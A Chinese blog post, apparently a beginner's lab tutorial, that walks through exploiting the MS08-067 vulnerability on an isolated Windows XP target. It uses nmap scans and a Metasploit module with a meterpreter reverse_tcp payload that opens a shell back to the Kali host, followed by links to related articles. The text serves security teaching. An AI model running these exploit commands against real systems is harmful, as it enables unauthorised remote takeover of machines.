渗透测试基础-1 针对MS08-067漏洞

已于 2022-05-09 16:52:15 修改
阅读量486 收藏 2
点赞数
文章标签: linux 安全
于 2022-05-07 10:45:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangyixing_mj/article/details/124623950
版权

一、准备工作

工具环境:kali 下载安装

靶场环境:windows xp

1.kali切换到root权限。有两种方式:直接切换到管理员权限,这种方式虽然比较方便,但是也比较危险,root权限很大,如果有误操作会产生较大的影响;当某些操作需要管理员权限时,临时提权,该操作结束后,恢复普通用户权限。推荐第二种方发

sudo su #切换到管理员权限下

sudo ifconfig #临时对ifconfig操作提权

2.将kali和靶场winXP设置到同一局域网下,将二者的网络适配器均设置为 仅主机模式。

操作:选中--右键--设置--仅主机模式

查看设置后二者是否在同一局域网下

kali命令

ifconfig

 winXP命令 

ipconfig

 

二、实验操作 

kali中:

msfconsole

nmap -F 192.168.92.0/24 #快速扫描该网段

nmap -T 4 -A 192.168.92.130  #深入扫描该网段中存活的主机

nmap -O 192.168.92.130   #查看OS相关

扫描结果可以看出:winXP版本符合,漏洞对应的端口也是开放的,所以可以断定有可能利用该漏洞。实际中,此时会进行一个语言,自己搭建一个靶场环境,模拟攻击,以便提高真实攻击的成功率。

search ms08-067   #查看是否有该漏洞的信息

use 0   #利用库中的攻击代码

show options   #查看参数

#需要补全参数

set PAYLOAD windows/meterpreter/reverse_tcp

show options #查看需要补全的参数

set RHOSTS 192.168.92.130    #设置攻击目标
set LHOST 192.168.92.129     #设置监听主机

show options   #查看设置好的参数,确定一下

run  #执行攻击,返回session视为成功

 现在到meterpeter中

 

help   #查看命令

进入对方的文件系统

 

aryaX
关注
利用win系统ms08-067漏洞.docx
10-26
该模块是Metasploit中專门针对MS08-067漏洞的exploit模块。 3. 加载该模块并查看该模块相关参数 使用use命令加载MS08-067模块,并使用info命令来查看该模块的相关参数。这些参数包括exploit的目标IP地址、攻击的...
Kali Linux渗透实战-MS08-067漏洞攻防实战窍门
hdx柿子的博客
03-27 1191
感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/ 一、MS08-067是什么 MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。 二、影响操作系统 Windows ...
MS08-067 漏洞利用与安全加固
theRavensea
03-15 2327
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。 Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。NetPathCanonicalize 函数在远程访问其他主机时调用 NetpwCanoni
红日靶场一
qq_26947429的博客
07-28 2404
一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集 三、内网搜集 7.内网--继续信息收集 8.内网攻击姿势--信息泄露 9.内网攻击姿势-MS08-067 10.内网攻击姿势-SMB远程桌面口令猜测 11.内网攻击姿势-Oracle数据库TNS服务漏洞 12.内网攻击姿势-RPC DCOM服务漏洞 四、横.
【小白学习记】漏洞复现验证篇-MS08-067
BeCareful0的博客
06-09 563
本文概述了在红日靶场环境中复现MS08-067漏洞的过程。首先介绍了环境设置,随后通过Metasploit框架执行了一系列命令,包括启动msfconsole,搜索并选择利用模块,配置目标主机和有效载荷,最后成功利用漏洞获取了反弹Shell。
记一次自建靶场域渗透过程
Boom!脑洞大爆炸的博客
07-04 1117
记一次自建靶场域渗透过程
渗透测试-内网网络服务端渗透.pdf
02-25
攻击过程涉及到攻击模块源码的解析,以及对特定漏洞机理的分析,如Ms8-62和Ms8-067漏洞,它们都是针对Microsoft服务的已知漏洞。 综上所述,服务端渗透测试涉及的技术和知识点非常丰富,包括但不限于内存攻防技术、...
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
最新发布
09-23
内容概要:详细记录了一次针对 Windows Server 2008 R2 的网络安全入侵测试流程,涵盖信息搜集阶段的端口与服务版本识别到MSFConsole利用工具的操作指引及后渗透技巧,例如提权、信息抓取与内部网络传播策略。...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
12-29
本主题将深入探讨一个具体的实例,即“ms10-046快捷方式图标漏洞”利用,以及如何通过Metasploit框架进行渗透测试。Metasploit是一款广泛使用的开源安全工具,它包含了大量预构建的攻击模块,便于安全专家进行漏洞...
MS09-001漏洞利用程序-GUI
02-19
安全研究和渗透测试中,理解漏洞的工作原理、如何利用以及如何防护是非常重要的。因此,这个GUI工具可以帮助安全专家和管理员更好地理解和应对MS09-001漏洞。 需要注意的是,"MS09-011利用程序.exe"可能是另一个...
Metasploit利用MS08-067漏洞
test
11-20 9395
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_...
一篇论文引发的入侵——记对当地医科大的渗透检测
孤水绕城的专栏
03-14 2540
记得很久没去高中群里冒泡了,估计好多同学都忘了俺了,可是没闪两句就收到一个很久没联系过的同学发来的信息,看了下原来是班里的一个PLMM发的。于是就聊了起来,聊来聊去料到了论文上,她说她现在在写医学论文,而且写的很辛苦,可是俺也没办法帮忙啊,俺又不懂医学的东东。不过俺这人见不得MM不开心所以就找一个在当地医科大上学的朋友,看看他能帮上忙不?可是他说他也不写,不过他说他们医科大网站服务器上就有论文。
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1439
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
渗透测试-信息收集的方法
lza20001103的博客
05-09 3315
渗透测试-信息收集的方法
MS08-067的稳定利用方法
LittleWallE的专栏
01-14 4885
MS08-067已经出来三个月了,大部分服务器已经打上了补丁,看来利用价值不大。但是做为一个学习的材料还是挺好的。这个漏洞的原理在很多文章中都解释的非常详细了,但是关于漏洞利用的文章却比较少(可能是我没找到),我自己摸索了一整子,参考了不少高手们写的exploit,终于摸索出一个还算稳定的利用方法,将摸索的过程整理成本文。如果您发现有什么不足之处,或者有更好的方法,请联系我: Li
MS08067利用方法
weixin_40789841的博客
01-21 1225
一、实验目的及要求 1. 掌握利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode代码,,打开目标主机端口,使用telnet连接目标端口,获得系统权限。 二、实验设备(环境)及要求 PC机, VC++等,虚拟云平台 三、实验内容与步骤 1.进入”c:\tools\MS08067利用方法”的目录 ...
ms08067实验室web靶场-Command
BROTHERYY的博客
09-28 865
打开环境与dvwa的命令注入有点像 这里过滤了很多,尝试用%0a来突破 能够正常执行命令以后,到根目录去寻找flag 直接cat读取flag 得到flag MS08067{0d07a0895471478280dd7effeb530ae7}
内网渗透笔记(二):MS08-067漏洞利用
hg666hh的博客
05-03 1884
漏洞介绍:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。(出自百度百科)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值